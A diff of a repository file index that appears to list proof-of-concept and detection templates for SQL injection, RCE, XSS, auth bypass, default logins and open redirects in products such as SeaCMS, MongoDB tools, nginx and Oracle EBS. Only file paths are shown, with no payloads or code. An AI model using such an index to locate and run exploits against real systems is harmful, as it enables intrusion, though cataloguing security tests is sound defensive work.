./poc/microsoft/samsung-wlan-ap-xss-10014.yaml
-./poc/microsoft/samsung-wlan-ap-xss.yaml
./poc/microsoft/samsung-wlan-default-login-10015.yaml
./poc/microsoft/samsung-wlan-default-login-10016.yaml
./poc/microsoft/samsung-wlan-default-login-10017.yaml
+./poc/microsoft/samsung-wlan-default-login-10018.yaml
./poc/microsoft/sanshuichinatelecombusinesssupportroomsystem.yaml
./poc/microsoft/sdcms神盾内容管理系统.yaml
./poc/microsoft/seaCMS-sqli.yaml
@@ -51307,9 +51281,11 @@
./poc/microsoft/seacms-before-v992-rce.yml
./poc/microsoft/seacms-dmku-sqli.yaml
./poc/microsoft/seacms-rce-10100.yaml
+./poc/microsoft/seacms-rce-10101.yaml
./poc/microsoft/seacms-rce-10102.yaml
./poc/microsoft/seacms-rce.yml
./poc/microsoft/seacms-sqli(1).yaml
+./poc/microsoft/seacms-sqli-10103.yaml
./poc/microsoft/seacms-sqli.yml
./poc/microsoft/seacms-v101v11-comment-api-sqli.yaml
./poc/microsoft/seacms-v654-rce.yaml
@@ -51326,6 +51302,7 @@
./poc/microsoft/seeddms-default-password.yaml
./poc/microsoft/seeddms-detect-10129.yaml
./poc/microsoft/seeddms-detect-10130.yaml
+./poc/microsoft/seeddms-detect-10131.yaml
./poc/microsoft/seeddms-detect.yaml
./poc/microsoft/seeddms-panel.yaml
./poc/microsoft/self-contained-with-params.yaml
@@ -51333,7 +51310,6 @@
./poc/microsoft/sensei-lms-85a373e82ccc10a34f197c7718aea84b.yaml
./poc/microsoft/sensei-lms-c63bf77b4673b1516933ee9dbc12c7ea.yaml
./poc/microsoft/sensei-lms.yaml
-./poc/microsoft/sevone-nms-network-manager.yaml
./poc/microsoft/sfwd-lms-06323fb9edeca49ba23c68725457bd17.yaml
./poc/microsoft/sfwd-lms-1330b5fcba1aa18649be523fba98826e.yaml
./poc/microsoft/sfwd-lms-338d1aba9fbf1a2bc39d1d885f9dce3d.yaml
@@ -51462,8 +51438,8 @@
./poc/microsoft/textme-sms-integration.yaml
./poc/microsoft/tiki-wiki-cms.yaml
./poc/microsoft/tikiwiki-cms-1.yaml
+./poc/microsoft/tikiwiki-cms-10773.yaml
./poc/microsoft/tikiwiki-cms-10774.yaml
-./poc/microsoft/tikiwiki-cms-10775.yaml
./poc/microsoft/tikiwiki-cms-10776.yaml
./poc/microsoft/tikiwiki-cms-2.yaml
./poc/microsoft/tikiwiki-cms.yaml
@@ -51471,8 +51447,8 @@
./poc/microsoft/tinychat-roomspy.yaml
./poc/microsoft/tomatocms.yaml
./poc/microsoft/top-xss-params-10806.yaml
+./poc/microsoft/top-xss-params-10807.yaml
./poc/microsoft/top-xss-params-10808.yaml
-./poc/microsoft/top-xss-params-10809.yaml
./poc/microsoft/top-xss-params.yaml
./poc/microsoft/topper-nms.yaml
./poc/microsoft/torro-forms-32b2e2ff95bce6c610720879796f4bca.yaml
@@ -51497,8 +51473,8 @@
./poc/microsoft/views-for-wpforms-lite.yaml
./poc/microsoft/vospari-forms-e9bd69dbdf78833ce2843fc07cba7b74.yaml
./poc/microsoft/vospari-forms.yaml
+./poc/microsoft/vpms-auth-bypass-11066.yaml
./poc/microsoft/vpms-auth-bypass-11067.yaml
-./poc/microsoft/vpms-auth-bypass-11068.yaml
./poc/microsoft/vpms-auth-bypass-11069.yaml
./poc/microsoft/vpms-auth-bypass.yaml
./poc/microsoft/vts-cms.yaml
@@ -51513,9 +51489,9 @@
./poc/microsoft/weforms.yaml
./poc/microsoft/wems-enterprise-xss.yaml
./poc/microsoft/wems-manager-xss-11191.yaml
+./poc/microsoft/wems-manager-xss-11192.yaml
./poc/microsoft/wems-manager-xss-11193.yaml
./poc/microsoft/wems-manager-xss-11194.yaml
-./poc/microsoft/wems-manager-xss.yaml
./poc/microsoft/whfst-cms.yaml
./poc/microsoft/white-label-cms-1855568f250a52767f45b60ca73feade.yaml
./poc/microsoft/white-label-cms-21f790f886a508204a6d79b9c5155bc7.yaml
@@ -51530,12 +51506,13 @@
./poc/microsoft/white-label-cms-plugin.yaml
./poc/microsoft/white-label-cms.yaml
./poc/microsoft/wondercms-detect-11221.yaml
+./poc/microsoft/wondercms-detect-11222.yaml
./poc/microsoft/wondercms-detect-11223.yaml
-./poc/microsoft/wondercms-detect.yaml
./poc/microsoft/woocommerce-ninjaforms-product-addons-fe7479a6b6025e86397ca09e26459aa3.yaml
./poc/microsoft/woocommerce-ninjaforms-product-addons.yaml
./poc/microsoft/woosms-sms-module-for-woocommerce-15f567edca2252a2ec556aac3ef868ef.yaml
./poc/microsoft/woosms-sms-module-for-woocommerce.yaml
+./poc/microsoft/wp-arforms-listing-11415.yaml
./poc/microsoft/wp-arforms-listing-11416.yaml
./poc/microsoft/wp-arforms-listing-11417.yaml
./poc/microsoft/wp-arforms-listing-11418.yaml
@@ -51546,12 +51523,13 @@
./poc/microsoft/wp-gravity-forms-spreadsheets-ce51e508f7b3ae4fa3cfc0e4f02b85ff.yaml
./poc/microsoft/wp-gravity-forms-spreadsheets-e2b56e01ba06c66b8d53d40581b73ce6.yaml
./poc/microsoft/wp-gravity-forms-spreadsheets.yaml
+./poc/microsoft/wp-mstore-plugin-listing-11500.yaml
./poc/microsoft/wp-mstore-plugin-listing-11501.yaml
./poc/microsoft/wp-plugin-lifterlms-11533.yaml
./poc/microsoft/wp-plugin-lifterlms-11534.yaml
./poc/microsoft/wp-plugin-lifterlms-11536.yaml
-./poc/microsoft/wp-sfwd-lms-listing-11562.yaml
./poc/microsoft/wp-sfwd-lms-listing-11563.yaml
+./poc/microsoft/wp-sfwd-lms-listing-11564.yaml
./poc/microsoft/wp-sfwd-lms-listing-11565.yaml
./poc/microsoft/wp-shamsi-124603a63a010e84e51504af813f16d0.yaml
./poc/microsoft/wp-shamsi-d80212b26727fff04d47601179cd407f.yaml
@@ -51656,7 +51634,9 @@
./poc/microsoft/wq-cms.yaml
./poc/microsoft/wuzhicms-detect-11652.yaml
./poc/microsoft/wuzhicms-detect-11653.yaml
+./poc/microsoft/wuzhicms-detect-11654.yaml
./poc/microsoft/wuzhicms-detect-11655.yaml
+./poc/microsoft/wuzhicms-detect.yaml
./poc/microsoft/wuzhicms-sqli-11656.yaml
./poc/microsoft/wuzhicms-sqli-11657.yaml
./poc/microsoft/wuzhicms-sqli-11658.yaml
@@ -51669,7 +51649,6 @@
./poc/microsoft/x-forms-express.yaml
./poc/microsoft/xdcms-sql.yaml
./poc/microsoft/xdcms-sql.yml
-./poc/microsoft/xdcms-sqli-11664.yaml
./poc/microsoft/xdcms-sqli-11665.yaml
./poc/microsoft/xdcms-sqli-11666.yaml
./poc/microsoft/xdcms-sqli-11667.yaml
@@ -51696,7 +51675,6 @@
./poc/microsoft/yzmcms-detect.yaml
./poc/microsoft/yzmcms-installer.yaml
./poc/microsoft/yzmcms-panel.yaml
-./poc/microsoft/zcms-v3-sqli-11773.yaml
./poc/microsoft/zcms-v3-sqli-11774.yaml
./poc/microsoft/zcms-v3-sqli-11775.yaml
./poc/microsoft/zcms-v3-sqli.yaml
@@ -51708,8 +51686,8 @@
./poc/microsoft/zhixiangOA-msglog.aspx-sql.yaml
./poc/microsoft/zhuofansoft-cms.yaml
./poc/microsoft/zms-auth-bypass-11829.yaml
+./poc/microsoft/zms-auth-bypass-11830.yaml
./poc/microsoft/zms-auth-bypass-11831.yaml
-./poc/microsoft/zms-auth-bypass-11832.yaml
./poc/microsoft/zms-auth-bypass.yaml
./poc/microsoft/zoho-crm-forms-214f15a18793e7b424d313f7d9322ea1.yaml
./poc/microsoft/zoho-crm-forms-2b5679f874f417055036f384b6409e12.yaml
@@ -51726,19 +51704,20 @@
./poc/microsoft/zzzcms-workflow.yaml
./poc/microsoft/zzzcms-xss.yaml
./poc/microsoft/zzzcms.yaml
+./poc/mongodb/alibaba-mongoshake-unauth-268.yaml
./poc/mongodb/alibaba-mongoshake-unauth-269.yaml
./poc/mongodb/alibaba-mongoshake-unauth-270.yaml
./poc/mongodb/dionaea-mongodb-honeypot-detection.yaml
./poc/mongodb/mongo-express-cve-2019-10758.yml
./poc/mongodb/mongo-express-web-gui.yaml
./poc/mongodb/mongodb-detect-8919.yaml
+./poc/mongodb/mongodb-detect-8920.yaml
./poc/mongodb/mongodb-detect-8921.yaml
./poc/mongodb/mongodb-detect.yaml
./poc/mongodb/mongodb-info-enum.yaml
./poc/mongodb/mongodb-ops-manager-8923.yaml
./poc/mongodb/mongodb-ops-manager-8924.yaml
./poc/mongodb/mongodb-ops-manager.yaml
-./poc/mongodb/mongodb-unauth-8925.yaml
./poc/mongodb/mongodb-unauth-8926.yaml
./poc/mongodb/mongodb-unauth-8927.yaml
./poc/mongodb/mongodb-unauth-8928.yaml
@@ -51752,13 +51731,13 @@
./poc/mongodb/robomongo.yaml
./poc/mongodb/rockmongo-default-credentials-9896.yaml
./poc/mongodb/rockmongo-default-credentials.yaml
+./poc/mongodb/rockmongo-default-login-9897.yaml
./poc/mongodb/rockmongo-default-login-9898.yaml
./poc/mongodb/rockmongo-default-login-9899.yaml
./poc/mongodb/rockmongo-default-login-9900.yaml
./poc/mongodb/rockmongo-default-password.yaml
./poc/mongodb/rockmongo-default-password.yml
./poc/mongodb/rockmongo-xss-9901.yaml
-./poc/mongodb/rockmongo-xss-9902.yaml
./poc/mongodb/rockmongo-xss-9903.yaml
./poc/mongodb/rockmongo-xss-9904.yaml
./poc/mongodb/unauthenticated-mongo-express-1.yaml
@@ -51767,6 +51746,7 @@
./poc/mongodb/unauthenticated-mongo-express-10910.yaml
./poc/mongodb/unauthenticated-mongo-express-10911.yaml
./poc/mongodb/unauthenticated-mongo-express-2.yaml
+./poc/mongodb/unauthenticated-mongo-express.yaml
./poc/mysql/EOffice_mysql_config_information_leak.yaml
./poc/mysql/ScanMySQLiErrorBased.yaml
./poc/mysql/create-mysql-detection.yaml
@@ -51793,14 +51773,15 @@
./poc/mysql/seeyon-a6-createmysql-disclosure.yaml
./poc/mysql/seeyon-oa-a6-createmysql-infoleak.yaml
./poc/mysql/unrestricted-sg-ingress-mysql-port.yaml
-./poc/netlify/api-netlify-470.yaml
-./poc/netlify/netlify-cms-9039.yaml
+./poc/netlify/api-netlify.yaml
./poc/netlify/netlify-cms-9040.yaml
+./poc/netlify/netlify-cms-9041.yaml
./poc/netlify/netlify-cms.yaml
./poc/netlify/netlify-takeover-9042.yaml
./poc/netlify/netlify-takeover-9043.yaml
./poc/netlify/netlify-takeover.yaml
./poc/nginx/default-nginx-page-6880.yaml
+./poc/nginx/default-nginx-page-6881.yaml
./poc/nginx/default-nginx-page-6882.yaml
./poc/nginx/default-nginx-page-6883.yaml
./poc/nginx/git-config-nginxoffbyslash-1.yaml
@@ -51810,9 +51791,10 @@
./poc/nginx/git-config-nginxoffbyslash-5.yaml
./poc/nginx/git-config-nginxoffbyslash-6.yaml
./poc/nginx/git-config-nginxoffbyslash-7.yaml
+./poc/nginx/git-config-nginxoffbyslash-7628.yaml
./poc/nginx/git-config-nginxoffbyslash-7629.yaml
+./poc/nginx/git-config-nginxoffbyslash-7630.yaml
./poc/nginx/git-config-nginxoffbyslash-7631.yaml
-./poc/nginx/git-config-nginxoffbyslash-7632.yaml
./poc/nginx/git-config-nginxoffbyslash-8.yaml
./poc/nginx/git-config-nginxoffbyslash-9.yaml
./poc/nginx/git-config-nginxoffbyslash.yaml
@@ -51824,13 +51806,11 @@
./poc/nginx/nginx-config-9096.yaml
./poc/nginx/nginx-config-9097.yaml
./poc/nginx/nginx-config-9098.yaml
+./poc/nginx/nginx-config-9099.yaml
./poc/nginx/nginx-config-exposure.yaml
-./poc/nginx/nginx-config.yaml
./poc/nginx/nginx-linux-page-9100.yaml
./poc/nginx/nginx-linux-page-9101.yaml
-./poc/nginx/nginx-linux-page-9102.yaml
./poc/nginx/nginx-linux-page-9103.yaml
-./poc/nginx/nginx-linux-page.yaml
./poc/nginx/nginx-merge-slashes-path-traversal-1.yaml
./poc/nginx/nginx-merge-slashes-path-traversal-2.yaml
./poc/nginx/nginx-merge-slashes-path-traversal-3.yaml
@@ -51856,7 +51836,7 @@
./poc/nginx/nginx-version-9119.yaml
./poc/nginx/nginx-version-9120.yaml
./poc/nginx/nginx-version-9121.yaml
-./poc/nginx/nginx-version-9122.yaml
+./poc/nginx/nginx-version-9123.yaml
./poc/nginx/nginx-version.yaml
./poc/nginx/nginx-vhost-traffic-status-9124.yaml
./poc/nginx/nginx-vhost-traffic-status-9125.yaml
@@ -51912,9 +51892,6 @@
./poc/nodejs/grandnode.yaml
./poc/nodejs/ibm-web-traffic-express-caching-proxy.yaml
./poc/nodejs/kube-api-nodes-8507.yaml
-./poc/nodejs/kube-api-nodes-8508.yaml
-./poc/nodejs/kube-api-nodes.yaml
-./poc/nodejs/lfr_express.yaml
./poc/nodejs/mailsite-express.yaml
./poc/nodejs/mailsiteexpress.yaml
./poc/nodejs/mongo-express-cve-2019-10758.yml
@@ -51942,11 +51919,12 @@
./poc/nodejs/nex-forms-express-wp-form-builder-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/nodejs/nex-forms-express-wp-form-builder-plugin.yaml
./poc/nodejs/nex-forms-express-wp-form-builder.yaml
+./poc/nodejs/node-ecstatic-listing.yaml
./poc/nodejs/node-env.yaml
./poc/nodejs/node-exporter-metrics-9135.yaml
./poc/nodejs/node-express-dev-env.yaml
./poc/nodejs/node-express-status.yaml
-./poc/nodejs/node-integration-enabled-9137.yaml
+./poc/nodejs/node-integration-enabled-9136.yaml
./poc/nodejs/node-integration-enabled.yaml
./poc/nodejs/node-nunjucks-ssti.yaml
./poc/nodejs/node-red-dashboard-file-read-cve-2021-3223.yml
@@ -51969,7 +51947,7 @@
./poc/nodejs/optima-express.yaml
./poc/nodejs/pcdn-cache-node.yaml
./poc/nodejs/pnpm-pnpm-lock-yaml.yaml
-./poc/nodejs/puppet-node-manager-detect-9720.yaml
+./poc/nodejs/puppet-node-manager-detect.yaml
./poc/nodejs/stardot-express.yaml
./poc/nodejs/sun-java-system-calendar-express.yaml
./poc/nodejs/unauthenticated-mongo-express-1.yaml
@@ -51978,7 +51956,8 @@
./poc/nodejs/unauthenticated-mongo-express-10910.yaml
./poc/nodejs/unauthenticated-mongo-express-10911.yaml
./poc/nodejs/unauthenticated-mongo-express-2.yaml
-./poc/nodejs/unauthorized-puppet-node-manager-detect-10959.yaml
+./poc/nodejs/unauthenticated-mongo-express.yaml
+./poc/nodejs/unauthorized-puppet-node-manager-detect-10958.yaml
./poc/nodejs/unauthorized-puppet-node-manager-detect.yaml
./poc/nodejs/webp-express-1fbe9279dc139e40de171678cc908922.yaml
./poc/nodejs/webp-express-802342a8791d6bf81a3a97aaebbba8bf.yaml
@@ -52016,7 +51995,7 @@
./poc/open_redirect/Url-Redirection-Catcher.yaml
./poc/open_redirect/WBCE CMS 1.6.1 - Open Redirect & CSRF.yaml
./poc/open_redirect/WordPress-Begin_Themes-Redirection.yaml
-./poc/open_redirect/age-gate-open-redirect-207.yaml
+./poc/open_redirect/age-gate-open-redirect.yaml
./poc/open_redirect/all-404-pages-redirect-to-homepage-cdee863c21664bd13f1b773588ad086d.yaml
./poc/open_redirect/all-404-pages-redirect-to-homepage.yaml
./poc/open_redirect/all-404-redirect-to-homepage-089607c10a667d577534d7f54440d6ac.yaml
@@ -52036,8 +52015,8 @@
./poc/open_redirect/aspnuke-openredirect-557.yaml
./poc/open_redirect/attitude-theme-open-redirect-587.yaml
./poc/open_redirect/attitude-theme-open-redirect-588.yaml
-./poc/open_redirect/attitude-theme-open-redirect.yaml
./poc/open_redirect/attitude-wp-theme-open-redirect.yaml
+./poc/open_redirect/aws-redirect-651.yaml
./poc/open_redirect/aws-redirect-652.yaml
./poc/open_redirect/aws-redirect-653.yaml
./poc/open_redirect/aws-redirect-654.yaml
@@ -52056,7 +52035,6 @@
./poc/open_redirect/bitrix-open-redirect-8.yaml
./poc/open_redirect/bitrix-open-redirect-9.yaml
./poc/open_redirect/bitrix-open-redirect.yaml
-./poc/open_redirect/brandfolder-open-redirect-779.yaml
./poc/open_redirect/brandfolder-open-redirect-780.yaml
./poc/open_redirect/brandfolder-open-redirect-781.yaml
./poc/open_redirect/brandfolder-open-redirect-782.yaml
@@ -52086,9 +52064,9 @@
./poc/open_redirect/drupal_module-pubdlcnt-open-redirect-vulnerability.yaml
./poc/open_redirect/easy-redirect-manager-15a476cd8a1fcf1c6c6e059975b58c8a.yaml
./poc/open_redirect/easy-redirect-manager.yaml
+./poc/open_redirect/eatery-restaurant-open-redirect-7158.yaml
./poc/open_redirect/eatery-restaurant-open-redirect-7159.yaml
./poc/open_redirect/eatery-restaurant-open-redirect-7160.yaml
-./poc/open_redirect/eatery-restaurant-open-redirect.yaml
./poc/open_redirect/eatery-restaurant-wp-theme-open-redirect.yaml
./poc/open_redirect/edd-conditional-success-redirects-2d0f5856608a10fb29f7e370acc0b71e.yaml
./poc/open_redirect/edd-conditional-success-redirects.yaml
@@ -52118,13 +52096,11 @@
./poc/open_redirect/homeautomation-v3-openredirect-7982.yaml
./poc/open_redirect/homeautomation-v3-openredirect-7983.yaml
./poc/open_redirect/homeautomation-v3-openredirect-7984.yaml
-./poc/open_redirect/homeautomation-v3-openredirect-7985.yaml
./poc/open_redirect/homeautomation-v3-openredirect-7986.yaml
./poc/open_redirect/htaccess-redirect-15d8c137823c3b6979566e3d6ce26232.yaml
./poc/open_redirect/htaccess-redirect.yaml
./poc/open_redirect/httpbin-open-redirect-8048.yaml
./poc/open_redirect/httpbin-open-redirect-8049.yaml
-./poc/open_redirect/httpbin-open-redirect.yaml
./poc/open_redirect/httpbin-open-redirect.yml
./poc/open_redirect/https-to-http-redirect.yaml
./poc/open_redirect/icewarp-openredirects.yaml
@@ -52145,6 +52121,7 @@
./poc/open_redirect/msmc-redirect-after-comment.yaml
./poc/open_redirect/multiple-parameters-openredirect.yaml
./poc/open_redirect/music-store-open-redirect-8972.yaml
+./poc/open_redirect/music-store-open-redirect.yaml
./poc/open_redirect/netsweeper-open-redirect-9063.yaml
./poc/open_redirect/netsweeper-open-redirect-9064.yaml
./poc/open_redirect/netsweeper-open-redirect.yaml
@@ -52153,7 +52130,6 @@
./poc/open_redirect/newsletter-open-redirect-9076.yaml
./poc/open_redirect/newsletter-open-redirect-9077.yaml
./poc/open_redirect/newsletter-open-redirect-9078.yaml
-./poc/open_redirect/newsletter-open-redirect.yaml
./poc/open_redirect/nextjs-redirect.yaml
./poc/open_redirect/ninjaform-open-redirect-9133.yaml
./poc/open_redirect/ninjaform-open-redirect-9134.yaml
@@ -52161,13 +52137,13 @@
./poc/open_redirect/noptin-open-redirect.yaml
./poc/open_redirect/novnc-url-redirection-cve-2021-3654.yml
./poc/open_redirect/oRedirect1.yaml
+./poc/open_redirect/odoo-cms-redirect-9199.yaml
./poc/open_redirect/odoo-cms-redirect-9200.yaml
./poc/open_redirect/odoo-cms-redirect-9201.yaml
./poc/open_redirect/odoo-openredirect.yaml
./poc/open_redirect/office365-open-redirect-9212.yaml
./poc/open_redirect/office365-open-redirect-9213.yaml
./poc/open_redirect/office365-open-redirect-9214.yaml
-./poc/open_redirect/office365-open-redirect-9215.yaml
./poc/open_redirect/ojs-unauthenticated-open-redirect.yaml
./poc/open_redirect/open-redirect-00.yaml
./poc/open_redirect/open-redirect-01.yaml
@@ -52214,7 +52190,6 @@
./poc/open_redirect/open_redirect.yaml
./poc/open_redirect/openredirect.yaml
./poc/open_redirect/oracle-ebusiness-openredirect.yaml
-./poc/open_redirect/otobo-open-redirect-9409.yaml
./poc/open_redirect/otobo-open-redirect-9410.yaml
./poc/open_redirect/otobo-open-redirect-9411.yaml
./poc/open_redirect/peters-login-redirect-099f67628707b3f385b479015262ac32.yaml
@@ -52224,8 +52199,8 @@
./poc/open_redirect/pieregister-open-redirect-9577.yaml
./poc/open_redirect/pieregister-open-redirect-9578.yaml
./poc/open_redirect/pieregister-open-redirect-9579.yaml
-./poc/open_redirect/pieregister-plugin-open-redirect.yaml
./poc/open_redirect/pollbot-redirect-9621.yaml
+./poc/open_redirect/pollbot-redirect-9622.yaml
./poc/open_redirect/pollbot-redirect-9623.yaml
./poc/open_redirect/postcode-redirect-6477bf18cad6c823db485408d49b337b.yaml
./poc/open_redirect/postcode-redirect-8fce0528958fb8f6fccd77f326340662.yaml
@@ -52372,7 +52347,6 @@
./poc/open_redirect/sap-redirect-10065.yaml
./poc/open_redirect/sap-redirect-10066.yaml
./poc/open_redirect/sap-redirect-10067.yaml
-./poc/open_redirect/sap-redirect.yaml
./poc/open_redirect/seo-redirection-00236bb3125835cea1f664a5a2990898.yaml
./poc/open_redirect/seo-redirection-02c98a3021ab90d177604810266eda87.yaml
./poc/open_redirect/seo-redirection-19ac51f8b0405a9ec28804b8aaa29d9c.yaml
@@ -52423,7 +52397,6 @@
./poc/open_redirect/thinkific-redirect-10737.yaml
./poc/open_redirect/tpg-redirect-85f56196634b8bf7c02f780064a6fc7d.yaml
./poc/open_redirect/tpg-redirect.yaml
-./poc/open_redirect/ultimatemember-open-redirect-10877.yaml
./poc/open_redirect/ultimatemember-open-redirect-10878.yaml
./poc/open_redirect/ultimatemember-open-redirect-10879.yaml
./poc/open_redirect/ultimatemember-plugin-open-redirect.yaml
@@ -52436,16 +52409,14 @@
./poc/open_redirect/weekender-newspaper-open-redirect-11186.yaml
./poc/open_redirect/weekender-newspaper-open-redirect-11187.yaml
./poc/open_redirect/weekender-newspaper-open-redirect-11188.yaml
-./poc/open_redirect/weekender-newspaper-open-redirect.yaml
./poc/open_redirect/weekender-newspaper-wp-theme-open-redirect.yaml
./poc/open_redirect/woo-login-redirect-317022364d5cdae673f22cdada5aba50.yaml
./poc/open_redirect/woo-login-redirect-e4654f9a46c58ec7da5e9256a56d6e89.yaml
./poc/open_redirect/woo-login-redirect.yaml
./poc/open_redirect/woocommerce-add-to-cart-custom-redirect-64a9b17becafc7bb8d1d5b45684524cd.yaml
./poc/open_redirect/woocommerce-add-to-cart-custom-redirect.yaml
-./poc/open_redirect/wordpress-redirection-plugin-listing-11306.yaml
./poc/open_redirect/wordpress-redirection-plugin-listing-11307.yaml
-./poc/open_redirect/wordpress-redirection-plugin-listing.yaml
+./poc/open_redirect/wordpress-redirection-plugin-listing-11308.yaml
./poc/open_redirect/wp-404-auto-redirect-to-similar-post-062dffbc9ba36d2c45b3c3ca1f34e0d3.yaml
./poc/open_redirect/wp-404-auto-redirect-to-similar-post-76a6410aed89ec5d80b58eb825a4989b.yaml
./poc/open_redirect/wp-404-auto-redirect-to-similar-post-c3c279f6a773c00d7aae3e43cf34cb82.yaml
@@ -52454,20 +52425,20 @@
./poc/open_redirect/wp-brandfolder-plugin-open-redirect.yaml
./poc/open_redirect/wp-domain-redirect-e5bf6ab8eeb40788caddb9493fd84dca.yaml
./poc/open_redirect/wp-domain-redirect.yaml
+./poc/open_redirect/wp-grimag-open-redirect-11458.yaml
./poc/open_redirect/wp-grimag-open-redirect-11459.yaml
./poc/open_redirect/wp-grimag-open-redirect-11460.yaml
./poc/open_redirect/wp-grimag-open-redirect-11461.yaml
./poc/open_redirect/wp-grimag-open-redirect-11462.yaml
+./poc/open_redirect/wp-gtranslate-open-redirect-11463.yaml
./poc/open_redirect/wp-gtranslate-open-redirect-11464.yaml
-./poc/open_redirect/wp-gtranslate-open-redirect-11465.yaml
./poc/open_redirect/wp-gtranslate-open-redirect-11466.yaml
-./poc/open_redirect/wp-gtranslate-open-redirect.yaml
./poc/open_redirect/wp-login-and-logout-redirect-bcc9e091fa98d610ac79a7162207c92e.yaml
./poc/open_redirect/wp-login-and-logout-redirect.yaml
-./poc/open_redirect/wp-prostore-open-redirect-11546.yaml
./poc/open_redirect/wp-prostore-open-redirect-11547.yaml
./poc/open_redirect/wp-prostore-open-redirect-11548.yaml
./poc/open_redirect/wp-prostore-open-redirect-11549.yaml
+./poc/open_redirect/wp-prostore-open-redirect-11550.yaml
./poc/open_redirect/wp-search-keyword-redirect-bf4ef59a087b3009bcd665ccc0df58a8.yaml
./poc/open_redirect/wp-search-keyword-redirect.yaml
./poc/open_redirect/wp-security-open-redirect.yaml
@@ -52485,6 +52456,7 @@
./poc/open_redirect/wpcf7-redirect-abd6bd305348b8021e7310c8ca2e06d0.yaml
./poc/open_redirect/wpcf7-redirect-c8c16c617550c7db690dbef59bc3b26a.yaml
./poc/open_redirect/wpcf7-redirect.yaml
+./poc/open_redirect/wptouch-open-redirect-11592.yaml
./poc/open_redirect/wptouch-open-redirect-11593.yaml
./poc/open_redirect/wptouch-open-redirect-11594.yaml
./poc/open_redirect/wptouch-open-redirect-11595.yaml
@@ -52509,9 +52481,9 @@
./poc/oracle/default-oracle-application-page-6893.yaml
./poc/oracle/default-oracle-application-page.yaml
./poc/oracle/dms-oracle.yaml
+./poc/oracle/metadata-oracle-8829.yaml
./poc/oracle/metadata-oracle-8830.yaml
./poc/oracle/metadata-oracle-8831.yaml
-./poc/oracle/metadata-oracle.yaml
./poc/oracle/oracle-access-management.yaml
./poc/oracle/oracle-access-manager.yaml
./poc/oracle/oracle-adf-faces.yaml
@@ -52520,7 +52492,6 @@
./poc/oracle/oracle-business-control-9344.yaml
./poc/oracle/oracle-business-control-9345.yaml
./poc/oracle/oracle-business-control-9346.yaml
-./poc/oracle/oracle-business-control-9347.yaml
./poc/oracle/oracle-business-control-9348.yaml
./poc/oracle/oracle-business-control.yaml
./poc/oracle/oracle-business-intelligence-password.yaml
@@ -52529,8 +52500,6 @@
./poc/oracle/oracle-containers-panel.yaml
./poc/oracle/oracle-dbass-detect-9349.yaml
./poc/oracle/oracle-dbass-detect-9350.yaml
-./poc/oracle/oracle-dbass-detect-9351.yaml
-./poc/oracle/oracle-dbass-detect.yaml
./poc/oracle/oracle-dbcs-9352.yaml
./poc/oracle/oracle-dbcs-9353.yaml
./poc/oracle/oracle-dbcs-9354.yaml
@@ -52552,7 +52521,6 @@
./poc/oracle/oracle-ebs-desr.yaml
./poc/oracle/oracle-ebs-lfi.yaml
./poc/oracle/oracle-ebs-sqllog-disclosure-9367.yaml
-./poc/oracle/oracle-ebs-sqllog-disclosure-9369.yaml
./poc/oracle/oracle-ebs-sqllog-disclosure-9370.yaml
./poc/oracle/oracle-ebs-sqllog-disclosure-9371.yaml
./poc/oracle/oracle-ebs-sqllog-disclosure-9372.yaml
@@ -52560,8 +52528,8 @@
./poc/oracle/oracle-ebs-xss-1.yaml
./poc/oracle/oracle-ebs-xss-2.yaml
./poc/oracle/oracle-ebs-xss-3.yaml
+./poc/oracle/oracle-ebs-xss-9373.yaml
./poc/oracle/oracle-ebs-xss-9375.yaml
-./poc/oracle/oracle-ebs-xss-9376.yaml
./poc/oracle/oracle-ebs-xss-9377.yaml
./poc/oracle/oracle-ebs-xss.yaml
./poc/oracle/oracle-ebusiness-openredirect.yaml
@@ -52576,20 +52544,20 @@
./poc/oracle/oracle-http-server-12c-9381.yaml
./poc/oracle/oracle-http-server-12c-9382.yaml
./poc/oracle/oracle-http-server-12c-9383.yaml
+./poc/oracle/oracle-http-server-12c-9384.yaml
./poc/oracle/oracle-http-server-12c.yaml
./poc/oracle/oracle-httpserver12c.yaml
-./poc/oracle/oracle-integrated-manager-9386.yaml
./poc/oracle/oracle-integrated-manager-9387.yaml
./poc/oracle/oracle-integrated-manager-9388.yaml
./poc/oracle/oracle-integrated-manager-9389.yaml
./poc/oracle/oracle-integrated-manager-9390.yaml
./poc/oracle/oracle-integrated-manager.yaml
./poc/oracle/oracle-iplanet-web-server-9391.yaml
+./poc/oracle/oracle-iplanet-web-server-9392.yaml
./poc/oracle/oracle-iplanet-web-server-9393.yaml
-./poc/oracle/oracle-iplanet-web-server.yaml
./poc/oracle/oracle-oam-xss.yaml
+./poc/oracle/oracle-opera-login.yaml
./poc/oracle/oracle-opera.yaml
-./poc/oracle/oracle-people-enterprise-9394.yaml
./poc/oracle/oracle-people-enterprise-9395.yaml
./poc/oracle/oracle-people-enterprise-9396.yaml
./poc/oracle/oracle-people-enterprise-9397.yaml
@@ -52863,7 +52831,6 @@
./poc/other/Avada.yaml
./poc/other/B2Bbuilder_v7-getshell.yaml
./poc/other/Bitrix_Account_UIDH.yaml
-./poc/other/Bitrix_check_env.yaml
./poc/other/Bitrix_server_testcheck.yaml
./poc/other/CISA.yaml
./poc/other/CORS Pre-Flight Bypass.yaml
@@ -52939,6 +52906,7 @@
./poc/other/LPDString.yaml
./poc/other/LSCP.yaml
./poc/other/LayerSlider-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
+./poc/other/LayerSlider-plugin.yaml
./poc/other/LibreOfficeImpressSCPair.yaml
./poc/other/LiveBOS_ShowImage_FileRead.yaml
./poc/other/Lm-FileRead.yaml
@@ -53048,7 +53016,6 @@
./poc/other/X-Host.yaml
./poc/other/X-Remote-Addr .yaml
./poc/other/X-Remote-IP .yaml
-./poc/other/X-Remote-IP.yaml
./poc/other/X-Rewrite-URL.yaml
./poc/other/X11Probe.yaml
./poc/other/Yes-059f1c0288ee3dfe1136ff4836457838.yaml
@@ -53347,6 +53314,7 @@
./poc/other/aceide-14b870f70e50eff1b77bf2010d096cc3.yaml
./poc/other/aceide.yaml
./poc/other/acenet-acereporter-report-component-arbitrary-file-download.yaml
+./poc/other/acenet-panel.yaml
./poc/other/acf-blocks-72203531faf01029b7468e544a690bea.yaml
./poc/other/acf-blocks-d41d8cd98f00b204e9800998ecf8427e.yaml
./poc/other/acf-blocks-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -53429,10 +53397,10 @@
./poc/other/activello-eb89877ab588a18f94a6a8698e8b083b.yaml
./poc/other/activello-fbae3dec6ddfe8541595eba73b51e18b.yaml
./poc/other/activello.yaml
